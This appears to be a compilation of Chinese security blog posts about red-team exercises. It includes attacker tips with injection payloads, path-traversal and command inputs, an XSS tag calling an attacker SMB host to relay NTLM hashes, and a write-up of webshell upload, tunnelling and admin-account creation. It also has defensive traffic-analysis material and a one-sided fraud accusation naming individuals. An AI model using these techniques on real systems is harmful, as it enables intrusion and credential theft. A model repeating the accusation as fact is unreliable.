2021HW小技巧总结 安全文章

2021HW小技巧总结

小弟也第一次参加hw,经过5天hw,确实也学到了许多的东西,但就本次分享而言,我分享一些我认为在hw里面值得注意的东西以及一些小技巧一.信息收集信息收集这个多西当然都是老生常谈了,你收集的东西越多,能打的方向也就越多,当然,hw给你打的资源的格式一般为单位名称,系统名称,域名,IP地址。当然,其他的资源可能都大同小异。网上都有很多信息收集的东西,都是那一套,扫端口,找子域名,看站有没有泄露什么东西,什么敏感文件,看网站的框架。现在,我就先给大家梳理一下。信息收集的本质有2个,一是把现有的资源扩大,能给我们多一些渗透的方向。二是了解渗透目标,是我们的exp能够精准有效的打击。如何把资源扩大?比如给的目标:单位名称:xxx市学校,域名:www.abc.com ip:123.123.123.123(有的要给端口)首先从单位名称入手,进入fofa或者其他搜收平台,title="xxx市学校"然后是域名,域名建议用挖掘机或者subDomainsBrute.pyip的话就是扫端口,外网建议用masscan,内网的话建议用nbtscan。如何了解我们的渗透目标推荐几款google的插件,第一款wappalyzer.当然,这款插件也不一定检查的全,但是还是能检查出大部分的,有些框架你要进入网站的一些目录才会检查出来,例如进入后台登录界面,一些文章分类的界面。当然还有一些小众的用法,就这一次,我们团队进了一个学校oa的后台,弱口令进的,但是那个后台没有上传,注入各类参数也没有测出来,然后在登陆界面上面写的是鹏达内网校园系统,但是进去就没有任何信息,然后就在网上找exp,没想到在cnvd上找到了注入,队友们真的好顶啊。第二款shodan这个可以探测端口,有些时候能探测出漏洞,就比如这次hw,我探测出来了心脏滴血,虽然最后没用用上然后是扫目录和找后台的,扫目录的我推荐dirsearch.py和御剑,找后台的我推荐test404轻量级后台扫描器。当然,以来我们可以先不扫,可以找一些敏感的文件后者后台,常见的敏感文件phpinfo,robots.txt.phpinfo的话可以看看绝对路径,网上也有几篇讲了phpinfo可以getshell,但我遇到了很多phpinfo没有get到一个,不过有一次倒是遇到了phpstudy的后门,秒了一次。robots.txt看的话也基本上是disallow,然后啥也没有了,但是还是看一看,万一有惊喜呢。有一个网站可以在线探测,还挺不错的,https://scan.top15.cn/web/infoleak但是其他功能就比较拉跨,哈哈哈哈。后台的话可以手动先找一下,admin,login,manager,或者比如成都市阿鑫鑫鑫鑫哥哥公司,www.abc.com/axxxxgg/admin,这样先探测一下,再扫,效果会更好一点。信息收集的话我们还是在每一个资源上都测一下域传输漏洞,如果真有,那岂不美滋滋?二.目标选择hw其实就只有这么几天时间,选择一个好的目标,我们能够在有限的时间内,更容易拿分。优先选择学校>化工&&交通&&能源&&论坛&&各类企业>医院&&银行&&电信(运营商搭建的)为什么这样选,因为高校的资源多,有OA系统,教务,学生平台,广播系统,新闻发布中心,乱七八糟的,都可以打,并且,高校的防御相对于没有那么森严,而且,也容易社工,比如xxx市职业学校,在qq上收一下什么xxxx市职业学校兼职群,xxxx市职业学校新生群,学号大把大把的有,其他的系统哪儿有那么容易。然后再说说为什么把医院银行,电信这三个放最后,首先是医院,如果真的拿下一个his的内网权限,真的对这个医院,或者是这个地级市造成不可估量的损失。所以防护肯定是拉满的,第二,资源少啊,一个医院,除了域名,oa系统,基本上你找不到其他资源了,并且一些敏感的目录动不动就500,怎么玩?银行也同理,所以,我们要想拿下,真就看运维,或者手上的day。中间的话,资源略少于学校,网站的防护也略低于医院银行。三.拿shell(得分)1.如果运气好,什么tp,joomla的框架,网上有exp,直接秒掉,这是最好的。2.弱口令,永远的神,admin admin admin admin123 admin 123456 先打一波,然后在合理的爆破,先不说拿不拿的下,当我们那一个弱口令,就用50-100的分,并且有很多口子,都是弱口令进入后台,拿下shell的。3.上传,上传成功就shell,还是很粗暴的,如果是黑名单,想办法绕,网上有很多思路的,白名单看是否存在解析,没有的话直接pass4.各类未授权什么redis,mongodb,扫了端口都先测一波,未授权的分虽然低,但是还是很多,不管是外网或者内网,特别是在内网打不动的时候,找一找未授权,形形色色的内网系统各类未授权的分真的相当于几台服务器了。5.注入注入的话现在越来越难利用了,因为注入曾经太猛了,mysql的话基本上是读读数据,读出数据进入后台拿下shell,mssql还好一些,运气好的话--os-shell直接cs上线,不支持堆叠注入的话吐司有一篇文章讲的就是不支持堆叠注入getshell。6.xss,钓鱼需要时间。7.其他漏洞xxe,ssrf,csrf等漏洞,真的遇到都算是不错了。四.hw测试的地方和一些另类小技巧1.对于java的框架真的要很敏感,常见的st2,jboss反序列化,shiro反序列化。2.看站的时候可以用xray,真的有用,这次hw找了3个注入,给长亭打钱3.当资源共享出来的时候,找到了什么弱口令,未授权,先交报告,然后在编辑,因为裁判要复现打一到,可能还要玩手机,所以不用担心交了报告马上就会审核,所以我们可以先交报告,站一个坑位,然后在编辑,因为当资源共享的时候,一个弱口令都是香饽饽,大家都会交,所以我们先交站坑位,如果裁判马上审,就是,哎哟,交快了,交了一个空报告,不好意思。4.当资源没有共享的时候,报告经量交一个完整的,就是外网打点进入,打穿内网,直接把这个资源的分恰满,但是资源共享的时候还是找了一个交一个,除非很有自信,其他队找不到。五.分享一些东西吧。(1)sql注入和逻辑漏洞1.注册账号的时候:账号admin空格空格空格空格空格空格 密码随意。登陆的时候会把空格解析掉,变成真正的admin。2.如若只能上传图片的时候,可以把图片名修改,造成二次注入.3.?x=1-if(user() like 'x%25',0,1)这条payload放入burpsuit,然后给x加入payload,大小写加上,处数据。4.好好利用bp与sql注入,可以更改包的格式,get改为Post,然后在输入payload。5.我们在用bp抓包是,我们可以将x-forward改为127.0.0.1,它可能对本地的包不过滤6.比如一个页面存在sql注入,但是可能会被拦截,我们可以尝试在url里头构造admin,install,等白名单词汇来绕过7.垃圾数据注入,如果是post型,就把垃圾数据放在需要注入的参数后面,如果是get型,就把他变成Post型,在放垃圾数据8.在后台,我们的账号权限不够,可以修改密码,将refer和Post里的参数改为管理员的账号已引发逻辑漏洞(2)信息收集篇1.如若存在git文件,.git文件可以用来恢复源代码2.ds_store可以用python的exp打3..svn文件4.如若扫到敏感文件,但是却没有权限访问,列如http://localhost:8080/urltest/info/secret.jsp此页面1.http://localhost:8080/urltest/./info/secret.jsp2.http://localhost:8080/urltest/;xinxin/info/secret.jsp3.http://localhost:8080/urltest/xinxin/../info/secret.jsp //都可以尝试一下5.如果存在swp文件,是vim的文件,我们可以用vim -r来恢复,说不定能看到一些yd的东西(3)上传篇1.如若不存在白名单限制,但就是上传不了,可以改为csproj这个后缀,再上传php,包含csproj即可常见的假后缀,phtml2.如若存在某种白名单限制,我们可以借助环境变量绕过,列如无法上传dll文件,我们可以将dll的后缀改为php,然后用sql查询hex值select hex(load_file('F:/phpstudy/phpstudy/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin/1.php'));然后再用php语法转化为dll二进制文件<?phpecho file_put_contents('udf.dll',hex2bin("这里为sql查询出来的值"));?>3.基于Content-Type,除了常见的application/xml,application/json,multipart/form-data还有就是application/vnd.php.serialized,将CT改为application/vnd.php.serialized(4)其他1.如果能上传swf,也可以根据swf构造xss的payload2.可以利用xss拿ntmlpython ntlmrelayx.py -tf targets.txt -c hostname > ~/smbrelay.txt //target.txt是ip地址<script src="\\10.0.0.7\smbrelay"><br> 3.如用xss拿下cookie,但是登陆以后是静态的,我们就得想到同源策略,设置document.cookie来共享cookie.<br> 4.ssrf利用可以将ip转化为8进制。//此外,八进制前面可以+0,可以加1-3个<br> 5.也可以将https:// 这2个//去掉<br> 6.重定向,<a href="https://[email protected]">https://[email protected]</a> //@可以变为#和?<br> 7.如若无法访问,可以尝试加上端口,加一个80<br> 8.平时用bp抓包,对cookie以及session这2个字段敏感一点,修改一下参数说不定可以造成任意用户浏览<br> 9.网页URL里头存在啥子action=,或者啥子单一的参数等于,可以搞啊一哈action=../../etc/passwd 可以用bp抓包,看到他的一些文件和路径<br> 10.如果用bp抓包,发现有command参数,我们可以试试cat+/etc/version看信息,根据版本来说</p> </script>作者:阿鑫鑫鑫鑫哥哥   文章来源:先知社区扫描关注乌云安全觉得不错点个“赞”、“在看”哦 本文始发于微信公众号(乌雲安全):2020HW小技巧总结
阅读全文
攻守道—流量分析的刀光剑影(上) 安全文章

攻守道—流量分析的刀光剑影(上)

这是 酒仙桥六号部队 的第 23 篇文章。全文共计3915个字,预计阅读时长12分钟。前言又到了一年一度的HW时刻,各家都在为HW积极筹备着,一些厂商也在做着攻防演练的工作,此时,有些真正的攻击者也在利用这个档口对一些网站进行攻击,浑水摸鱼,这样,对于防守队员来说,分析流量做应急的工作就会变得更加困难。这不,某公司内网网络被黑客渗透,接下来,我们就借助wireshark来对流量包进行分析,来还原查找黑客留下的蛛丝马迹,还原攻击的现场。wireshark作为流量分析神器,在开始之前,先来简单科普一下它的一些常用的过滤命令。过滤查看包含某字符串的http数据包:http contains “string”(tcp同理)过滤查看请求某一url的流量:http.request.uri == “path”或 http.request.uri contains “path”过滤出某一ip的流量:ip.addr == ip 或 ip.src == ip 或 ip.dst == ip跟踪显示http请求包与返回包可以Fllow HTTP Stream第一问 扫描器首先来看第一个:黑客用什么扫描器进行的扫描?在开始这个问题之前,我们先来说一说在应急、流量分析的时候,如何快速发现是不是有扫描器扫描的痕迹。一般最常用到的扫描器有WVS、nessus、APPscan、绿盟极光、sqlmap、dirsearch等等,所以我们就要了解这些扫描器本身的一些特征。WVS扫描器通常默认情况下,会在请求的数据包中带有wvs、acunetix_wvs_security_test、acunetix、acunetix_wvs等字样。Nessus扫描器默认情况下会包含nessus字样。APPscan默认情况下会包含APPscan字样。绿盟极光扫描器一般会包含nsfocus、Rsas字样。sqlmap大多情况下也会包含有sqlmap字样。以上情况均为一般、默认情况,但是大多数情况下攻击者都会对自己的行为进行隐藏,如果人家对自己使用的工具做了修改,就为了隐藏让你不好分析,那你就只能另辟蹊径了。好了,了解了一般情况下扫描器的特征,我们就来找找看,一共一个多G的pacp包,一个请求一个请求的来找,怕是找到黑人抬你的时候都找不完,这时就要用到wireshark的命令了,通常情况下,扫描器扫描web应用的流量都是http流量,筛选过滤走起,先来找找看有没有wvs的扫描流量,过滤命令:http contains wvs很明显用了WVS,再搜一搜其他扫描器的特征字符,并没有搜到,看来这个黑阔只用了wvs来扫描。从这个流量中也能确定使用扫描器的攻击者的ip地址,可以先将此ip记录下来,再看看还有没有其他的扫描IP,用到的命令:http contains wvs and not ip.addr==192.168.94.59可以看到过滤之后没有其他的数据包,可以确定只有这一个ip在发起攻击,明确了攻击ip,之后的分析就会轻松一些。第二问 后台黑客扫描到的网站后台是什么?从这个问题出发,我们先确定三个要素:黑客、扫描、后台。从前面我们已经确定了黑客的攻击IP,也确定了扫描器是使用的wvs,那么我们只需要找到后台就可以,我们先假设一些可能的后台关键字:admin、login、administrator。在实际情况中,真正攻击者会隐藏自己的攻击行为,所以不必要过于在意是不是使用的扫描器,只要是这个IP发出的请求,我们都认为他是攻击行为,这样可以尽可能的减少我们分析过程中出现的遗漏。我们先过滤数据包,来看看攻击者访问的登录地址有哪些。这里我们用到的命令:http contains login and ip.addr==192.168.94.59从筛选出来的数据包中,能够看到一个/admin/login.php的请求,我们来跟踪看一下。从前边小箭头的关系就能看出来第一个数据包是request数据包,下边的是response数据包,该请求的请求地址是/admin/login.php,返回状态是200。从这里难道就能确定黑客找到的后台就是它吗?不能直接确定,万一是网站做了统一错误页面呢,也可能是返回状态200,但请求文件不存在。所以我们只能看一下这个数据包具体的内容了。来Fllow HTTP Stream看一下。看到这个返回包的内容,我们可以肯定了,这个地址是存在的,并且可以确定是后台登录地址了。你以为到这里就结束了吗?并没有,我们还需要看看其他的数据包,看看是不是还有其他的后台。通过筛选分析,没有发现有其他存在的后台地址,所以确定黑客攻击的后台地址为/admin/login.php。第三问 账号攻击者使用什么账号登录了后台?上一问中,我们知道了网站的后台地址,现在,我们可以先通过该后台地址了解一下这个网站登录成功的特征。先筛选POST提交账号密码的数据包。这里看到有一个登录数据包,跟踪这个流量来看一下。可以看到这个网站正常登陆后会返回302数据包跳转到/admin/index.php页面,应该就是登录成功了。这个会是攻击者登录的吗?本着不信任任何数据包的信念,把这个登录者的行为来分析一下。先看看他发起了多少次登录请求。登录请求只有三次,而且每次使用的账号密码都相同,如果是攻击者,那么他在发起攻击之前就已经获得了此后台的账号。再来看看除此之外他还有哪些请求。筛选这个ip的请求发现他请求了一个backup.php文件,看看关于这个backup文件还有哪些操作。这里有个对backup文件的POST请求,从请求的内容中分析可以看出来这个backup.php文件的功能是进行数据库备份,再返回来看看这个登录者执行备份操作后还有什么后续的行为。寻遍所有的请求,都只有正常的操作请求,一点点的恶意攻击操作都没有,看来这个ip是正常的员工登录使用。那就再返回来,根据这个登录跳转特征我们来分析一下,来找找攻击者所使用的是什么账号登录的。过滤出来返回包状态302,包含跳转地址为/admin/index.php。只有两个ip登录成功跳转到了后台,我们已经确定了192.168.94.233是正常用户,那么另外这个就应该是攻击者了,来跟踪看一下这个登录所使用的账号信息。再来筛选一下这个ip发起的登录请求,发现存在大量的登录请求,登录成功的数据包就夹杂在这些登录请求中,那么就实锤了,攻击者通过登录爆破的方式爆破出了admin账号的密码,然后使用这个账号密码登录成功后进入后台执行下一步的攻击。第四问 webshell黑客上传的webshell文件名是什么?内容是什么?从前面我们也已经知道,这个网站是PHP的网站,所以上传的webshell也可以先从php后缀文件开始判断,根据PHP一句话webshell的特征先来看看有什么。前边两个GET请求应该是扫描器行为,直接看后边POST请求的a.php文件,跟踪一下这些文件的请求内容和返回包,查看是否为完整的webshell请求。毫无疑问,这个a.php就是我们要找的webshell了。在实际的应急处置过程中,一般我们都需要对攻击进行溯源分析,找到黑客的攻击途径,那么这个webshell是如何被传进来的,我们来分析一下。从http流量中搜寻了半天,始终没有发现上传a.php文件的痕迹,猜测可能上传的数据包在记录时并没有记录为http流量,可能为tcp流量,于是改变策略,来从攻击者发起的所有的流量来寻找一番。根据上边攻击者访问a.php执行的代码,来搜索一下$_POST内容,看看有什么结果。搜索一番,发现了这个数据包,看起来是上传了一个一句话木马,但是跟上边a.php的webshell不一样,来跟进去分析一下。这个是直接上传了一个1.php的一句话,看来可能还不止有a.php这一个webshell,我们再来分析看一下。寻遍所有的流量包,只发现有上传1.php的数据包,没有成功请求1.php的数据包,猜测可能被杀软干掉了,那么继续寻找a.php上传的途径。从这个数据包中,我们可以发现a.php文件的上传时间,我们来根据时间查看一下上传的数据包。查看之后发现提供的数据包没有覆盖到上传a.php的时间,这样看来,似乎就无法定位攻击者的攻击途径了。但是呢,这里对比一下上传的1.php的内容跟a.php请求传输的内容,是不是已经发现了关联,1.php获取的参数密码是1234,a.php传输的内容也是1234为参数名,那么a.php的webshell内容就应该与1.php一样,不过这个a.php传输的内容也不复杂,也可以反推出来a.php的内容。那么我们这里就能基本判断出来攻击者是如何getshell的了,大致的攻击流程就是:扫描后台—>爆破密码—>登录后台—>上传webshell—>持久控制。拓展通常,攻击者获得主机权限后为了进一步持久化控制主机,会使用一些较为隐蔽的方法来控制主机,经常会用到CobaltStrike,在CS中提供的有http隧道、https隧道、DNS隧道、SMB隧道。在流量分析的视角下,这些流量会是什么样的一个状态,我们一起来看一看。HTTP隧道首先我们使用CobaltStrike生成一个beacon模式的HTTP协议木马,将木马放在widonws主机下执行,然后同时使用wireshark来抓包查看整个通信过程。(这里我所使用的CobaltStrike版本为4.0)执行木马主机上线后,这里我执行了ipconfig、net user、dir命令,来看一下cobaltstrike远程控制主机执行这些命令后,teamserver与远控主机之间是如何进行通信的。对远控主机与teamserver之间的所有通信流量进行分析查看,在数据传输上均没有直接传输的明文数据,对这些数据包传输的数据都分析一下,来看看CobaltStrike的HTTP隧道远控的特征。一共执行了4次命令,每次执行之后,都会从远控主机向teamserver发送一个POST请求,请求的文件为submit.php。跟踪数据包后可以看到,所有的POST请求内容都是乱码,所以在进行流量分析的时候也无法直接判断是不是远控的请求流量。可能与CobaltStrike的版本相关,CobaltStrike 4.0版本中的HTTP隧道传输的数据内容均被加密。使用CobaltStrike 3.12进行尝试,使用HTTP隧道执行命令时,分析整个过程的流量包,对比中可以发现3.12版本中木马将执行命令的结果回传至teamserver服务器时,传输的数据为明文方式传输,这种方式较容易判断。对比可以发现,无论是什么版本,在回传数据时,都会由被控主机发起一个请求路径为submit.php的POST请求,并且Content-Type为application/octet-stream。这个特征可以作为使用CobaltStrike的HTTP隧道进行远程控制的一个特征。对比来看,在进行攻击使用远控时,相对来说较高版本的CobaltStrike的隐蔽性还是比较强的。HTTPS隧道与http隧道相同,我们先使用CS创建一个基于HTTPS隧道的木马,同时进行抓取流量包,主机上线就可以看到有很多握手包。通过CS执行命令,这里我执行了net user、whoami、ipconfig、dir命令,来看看执行这些命令的流量数据包。由于是走的HTTPS隧道,所以整个数据包也都被加密了,通过这些数据包,从中也提取不到有价值的特征字符。基于HTTPS隧道的远程控制相对来说还是比较隐蔽,所以要想单纯通过流量来判断是不是有CS的远控流量,是非常非常困难的。小结HW时攻击方手段百出,防守方也需要明察秋毫。通过对流量的分析,发现攻击痕迹,还原攻击现场,掌握攻击者意图,才能更好的完成HW任务。第一部分的流量分析就到这,更多精彩内容请继续关注我们的公众号。 本文始发于微信公众号(谢公子学安全):攻守道—流量分析的刀光剑影(上)
阅读全文
【警惕HW诈骗】HW行动10W血汗钱应该如何追回! 安全闲碎

【警惕HW诈骗】HW行动10W血汗钱应该如何追回!

认识四年的朋友竟然骗了我,在今年2021年2月份左右网名:【王艾】真名:施X亮向我开始要人,准备开始今年的HW行动。出于信任我将我们学员介绍给了他,经过面试选拔,其中五个学员面试成功。当面试成功后,为了防止黑中介,我还特地叫他一定要:签订合同是否背对背付款付款时间因为涉及到税务原因,王艾自身没有公司,所以找了【安徽科盾】来与我们学员签订合同。当初应该我们公司【巴中殷诚】->【安徽科盾】签订合同协议,但是如果一旦这样做就涉及到了税会多出6%,所以我就让【王艾】直接与学员签订合同,这样能够让学员赚的更多,可惜没想到遇到了两个骗子!这个吊毛还说结款给我图,结果到现在为止都没有给过我们一分钱!在今年6月份开始出了问题,陆续有几个学员告诉我还没结款,因为我们公司也跟某藤合作过几次,对他们的借款速度我们是知道的,按常理早就已经结算了!结果一个礼拜,过了一个礼拜,到现在为止:9月18日还没搞定!最后我们才知道大概的事件原因:以下是我的逻辑图乙方一号没有任何问题,按照合同将钱打给乙方二号,但是乙方二号属于个人,无法直接跟一号签订协议,于是二号找来了乙方三号来作为跳板。问题就出现在:乙方二号跟乙方三号原先商定好的介绍费,乙方三号并没有按照约定打给二号,因为二号跟三号直接的协议完全就是瞎几把乱写!重点:乙方三号 将5名IT农名工应得的工资全部打给了乙方二号,但是乙方二号的介绍费用貌似是没有打,造成乙方二号觉得自己亏损于是将5名原本属于用户的钱私自扣留!问题一:王艾【乙方二号】属于中间商,自己未与科盾公司【乙方三号】处理好双方介绍费等款项的合同,属于王艾自身原因。跟5名用户的辛勤劳动有什么关系?王艾 你有什么理由不给钱?问题二:王艾你赚钱的时候为什么没想着给信你的人分钱,反而在出现问题的时候躲躲闪闪?难道在你身上责任二字如此之轻嘛??问题三:科盾公司,难道你就没有责任嘛???用户与你签订的合同,出了问题你给一句:找王艾 ,事情就这样解决了嘛?合同上面的公章你难道装作不认识嘛?问题四:王艾你把你银行卡,支付宝,微信,所有的钱全部转移,你又居心何在?是不是早就想好了跑路??到目前为止,我们找过了公安,咨询了律师,给到的结果都是无法立即要回钱,最终只能去法院起诉科盾跟王艾,但是一旦起诉就是漫长的等待,问过朋友,可能基本都要2 3年才能拿到钱,有的人急需用钱,也有的人都已经去借钱租房!希望各位行业同胞,一定要警惕!也希望各位能多多转发一次,让更多人看到这两个吃人不吐骨头的人!写到最后,我遇人不淑,把信任我的学员推给了无耻之徒,我个人有逃不掉的责任,我个人一定会将10w多欠款追回!否则绝不妥协!有更多好的建议的朋友麻烦可以联系微信:CYWLHL ,感谢各位! 本文始发于微信公众号(诚殷网络Team):【警惕HW诈骗】HW行动10W血汗钱应该如何追回!
阅读全文
记一次hw行动中的渗透测试 安全文章

记一次hw行动中的渗透测试

作者:橄榄 编辑:白帽子社区运营团队    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)"    前言本文总结一下今年某次hw渗透测试过程,虽然现在的教育机构越来越重视安全,但没有绝对的安全,所谓的安全性其实都是相对的。1.信息踩点在这里其实没办法去做一些有价值的收集,只能踩点,踩坑。具体为拿到目标域名,二话不说信息收集一波,常规操作,phpinfo.me/oneforall子域名,fofa/钟馗找资产,googlehacking找历史泄露信息,nmap端口开扫,等等,还不错十几个站点。然后就是习惯性地见后台就弱口令,见.do/.action就structs洞,见tomcat就后台弱口令,各种sql注入,逻辑漏洞,xss当然也试试啦,然并卵,两个小时过去了,一无所获。2.硬怼CAS大家都知道很多教育机构为了保护已有老旧资产、避免重复登录机构内部多个系统,纷纷对接了统一验证平台这种CAS一般是非常安全的,但是我这里居然发现了一个可怕的逻辑漏洞。具体讲就是,在密码找回功能中,输入管理员账号admin时,由于没有绑定验证方式,居然直接弹出信息提示“没有绑定邮箱”,且给出了该用户的身份证号!于是我利用这些信息居然就重新绑定了自己的邮箱进行重置密码成功!利用管理员账号登陆统一门户,进入后,发现该账户具有超级管理员权限,门户中的很多站点都能够直接进入其中3.绕WAF拿shell找了一遍没有VPN系统,于是考虑先拿个webshell获取内网通道,这里选了个网络办公系统。进入发件箱->写信发现页面上文件上传功能出现后又消失,利用开发者工具查看js代码:复制本地查看:获取上传地址:/GED-0.7/UploadEmailAttach?TOPATH=//gfs//tdata//GED-0.7//emailAttach/文件名添加垃圾字符绕过waf:拼接url获取shell地址:http://xxx.com/GED-0.7//emailAttach//856193bba7a24a758b343564564567af.jspx:接着利用frp搭建跳板,突破边界进入目标内网ifconfig发现若干内网网段4.内网横行内网一般而言防守比较薄弱,存在很多弱口令机器,及能够直接rce的机器(如struts/shiro/ms17010等),这里具体举例如下:(1)交换机弱口令123456目标为http://192.168.xxx.xx/ip.html(2)一台sqlserver数据库服务器弱口令sa/sa可执行系统命令增加一个账户,并加到管理员组直接通过test [email protected]账号登录机器远程桌面改注册表复制test为administrator 以管理员的权限上了这台192.168.xx.xxx,在其桌面上的视频监控系统能看到摄像头两台(3)redis 数据库未授权访问(可getshell)5.总结总体渗透思路就是信息搜集->CAS逻辑漏洞->文件上传漏洞绕WAF->frp跳板进内网->内网横向等等。往期精彩文章docker下安全问题总结通达OA漏洞整理记一次日志分析【赛题实操】tzzzez-掘地三尺技术支持:白帽子社区团队— 扫码关注我们 — 本文始发于微信公众号(白帽子社区):记一次hw行动中的渗透测试
阅读全文
某省HW中遇到的提权 安全文章

某省HW中遇到的提权

此文为2019年的,供参考学习。某省 HW 中遇到的一个环境提权笔记0x01环境:OS: Windows Server 2012 R2补丁情况:KB3139914 : MS16-032KB3124280 : MS16-016KB3134228 : MS16-014KB3079904 : MS15-097KB3077657 : MS15-077KB3045171 : MS15-051KB3000061 : MS14-058KB2829361 : MS13-046KB2850851 : MS13-053 EPATHOBJ 0day 限 32 位KB2707511 : MS12-042 sysret -pidKB2124261 : KB2271195 MS10-065 IIS7KB970483 : MS09-020 IIS6安全软件:360 套装Webshell: :white_check_mark:内网既然有 16-032,为了一次成功,本地搭个环境,github 上面下载到的 ms16-032 果不其然被 Gank 了那么就需要做免杀了,然而自己做的免杀要么要么要么是编译好了跑不起来(vs2019 编译的,SDK 太高了?)这时朋友扔了个思路过来然后我们进行操作用 webshell 试试添加成功了,接下来试着添加到管理组猜到还是 360 在作怪然后换了个思路,抓 lsass 内存由于是 2012,修复了 lsass dump 内存时会转储明文密码的漏洞,只能 dump NTLM 的 hash,但是运气不错,是个弱口令,cmd5 解出来直接登录通过登录记录,拿下第二台作者: Sp4ce,转载请注明来自 Sp4ce's Blog!推荐阅读扫描关注乌雲安全觉得不错点个“赞”、“在看”哦 本文始发于微信公众号(乌雲安全):某省HW中遇到的提权
阅读全文
HW终于结束了来写总结(hw总结模板) 安全文章

HW终于结束了来写总结(hw总结模板)

摘要】今年到写总结的时间了,我们整理了一下去年总结的模版并带一个实例,由于每家企业防护手段不一、组织架构不一,并且以下案例未必真实,所以完全照抄的可能性不大,所以仅供参考~~~: ... 今年到写总结的时间了,我们整理了一下去年总结的模版并带一个实例,由于每家企业防护手段不一、组织架构不一,并且以下案例未必真实,所以完全照抄的可能性不大,所以仅供参考~~~:      201X年X月X日-201X年X月X日,XX发起了针对关键信息基础设施进行攻防演练的HW工作。XXXX平台作为防守方,成功防御了XX的攻击,没有被攻破,同时发现并处理了XXXX,经XX确认,得分X分。 平台按照XX和XX的统一部署,重预警、早排查,演练期间,加强安全专项巡检,做好相关汇报工作,对发现的安全问题及时整改,按照组织要求认真做好各阶段工作,顺利完成了防守任务,提升了XX平台的网络应急安全应急处置与协调能力,提升了XX平台安全防护水平。具体情况如下: 一、前期准备 1、成立XX平台HW201X工作专项小组,并由公司负责人牵头,各部门协力配合,做到了分工明确,责任具体到人;同时完善相关安全制度优化完成《XXXX平台应急处置方案》和《XX平台防守组工作方案》,保障HW工作正常有序开展。 2、开展运维自检自查工作以及第三方协查工作。通过资产梳理工作,对XX平台网络策略优化xx项,修复高危安全漏洞xx余项,其中自主发现高危安全漏洞xx项,XX协助发现高危漏洞x个,包含在自主发现漏洞中,已做到对高危漏洞清零,检测发现并修复平台弱口令xx项。 3、组织防护工作演练,编写《xxXX平台工作部署》方案,对HW期间工作进行紧密部署,加强完善平台安全巡检,增强团队协作能力。 4、组织协调第三方能力,在此期间对物理机房、云服务商监测加强监控、检测要求,XX协助提供x云安全监测服务,并配置入侵检测系统,同时安全部对公司内部进行安全意识宣贯,降低被钓鱼攻击风险。二、组织实施 (一)加强组织协调 在公司内部设置专项防守场地,安排XX平台各部门负责人、核心部门驻场值守。安排专人进行对接,随时与防守团队保持联络,通过电话会议每日协商,汇总当日所发生的安全事件,针对安全事件进行应急响应和处置。 (二)安排重点值守 各部门各司其职,加强防守整改。其中XX部整体把握XX防守情况,负责与总体防守组的沟通联系,负责信息对接,保持随时联络,提交防守成果。XX部负责对网络安全策略进行梳理,删除无效策略;XX部负责对主机系统安全基线进行检查落地,修复主机漏洞,对中间件平台进行升级;XX梳理数据库相应安全权限,对权限进行严格控制;XX部负责对代码层安全漏洞进行修复,并对后台管理进行安全防护;XX部负责撰写整体《安全应急相应方案》以及《HW工作安排部署方案》,加强安全监测预警、安全防护和应急处置能力。 (三)开展防守工作 攻防实施阶段 1、严格落实值班制度。平台加强了每日巡检力度,从巡检次数从每日二次调整为每日三次,同时安排专人负责安全巡检,对巡检项进行详细记录,并于每日下午X点前上报;并安排专人在部机关值守,确保信息沟通顺畅。 2、认真落实报告制度。安排专人到XX负责联络工作X周,并每日于X点、X点进行工作汇报总结,对攻击手段、封禁IP地址,账号爆破情况进行梳理归纳,发现攻击问题第一时间上报总体防守组。编制X份防守成果报告,经演戏指挥部确认,得分XX分。 3、全面做好检测预警工作。平台对WAF、IDS、以及邮箱、VPN等账户,系统状态、网络状态等进行全方位监控,共发现账户破解、扫描、命令执行、SQL注入等攻击数百次,对异常IP进行及时封禁,共计封禁IPXX余个,未发现攻击成功现象。 4、 加强监控应急处理能力。在平台发现被爆破的账号后,并在第一时间对问题账户进行删除操作;发现并删除恶意木马文件XX个,并阻止该恶意程序运行,上报防守成果,同时优化平台相关服务,关闭木马上传路径。 5、攻防实施阶段XX平台共检测到恶意扫描攻击XX次,平台封禁恶意IP地址XX余个,公司邮箱账户被尝试爆破XX余个,均未成功,XX平台业务账户被尝试暴力破解XX个,成功X个,VPN账号被尝试暴力破解X个,未成功,发现XXXXXXXX公司官网网站有异常IP入侵,发现XX平台、XX平台有异常IP入侵,采取封禁IP措施,对XX平台网站应用系统弱口令问题进行整改。三、威胁汇总及整改情况 演习结束后,根据XX与XX相关要求,对攻防演习工作中发现的问题成果进行梳理,共有X项其中XX平台安全隐患X项,非XX平台安全隐患共X项,通知相关部门进行整改,已经完全整改完毕。 (一)XX平台威胁整改情况 本次参演的XX平台共被发现X处安全隐患,存在XX问题,目前已全部修复。 (二)非目标系统威胁整改情况 本次演习攻击方对演习目标所属公司系统进行了攻击渗透,共发现威胁X个。截止目前,已完成所有问题整改、漏洞修复。 四、存在问题 (一)XX平台系统此次攻防演习过程中,存在问题如下:     1、基础运维存在薄弱环节....     2、系统存在弱口令问题..... (二)公司存在的问题 公司的其他信息系统不在本次攻防演习范围内,故本次演习前准备阶段未对XXX平台、XXX平台进行风险隐患排查和整改加固。 经分析,攻击方主要是通过三种途径开展渗透攻击:一是利用系统已知漏洞,获得系统服务器权限,对内网开展渗透共计;二是利用用户弱口令漏洞,获取网络及信息系统关键信息;三是通过SQL注入、文件上传漏洞等攻击方式,对目标系统开展攻击,获取系统权。根据上述攻击方式,反映出公司存在的问题有:     xxxxxxx...... 下一步工作      针对XX平台存在的问题,我司将进一步提高认识,加强人员往来安全意识教育,组织信息安全培训,不断提高全员安全意识。针对上述存在的安全问题整改完成后,举一反三,查找存在类似安全隐患并整改,不断完善网络及信息系统的网络架构规划及制度管理。主要措施如下: (一)基础运维方面 1、加强设备管理,梳理资产信息,严格核对CMDB中信息,将密码变更列入季度安全运维工作,对不在用的策略、服务器进行清理线下,将继续使用的设备进行资产审核,确认资产信息准确性。 2、严格杜绝系统弱口令,加强口令强度设置;需要用户注册功能的,要对注册用户加以限制,要对上传文件格式限制;加强信息系统及用户账号的管理,定期查看使用情况,确认不用的系统、用户账号及时进行关停处理。 3、需要对防火墙策略申请、端口映射申请进行周期性梳理,删除无效、无用策略,防止内部服务被误开放到互联网平台。 4、严格控制运维、研发、测试等技术型人员在服务器上明文存储备份账号密码,随意开放查看权限,对离职员工账号密码进行严格审查,删除,关闭。 (二)安全防护方面 1、加强公司网络边界防护,更新升级防火墙、防毒墙等安全设备,做好外部入侵防护控制。 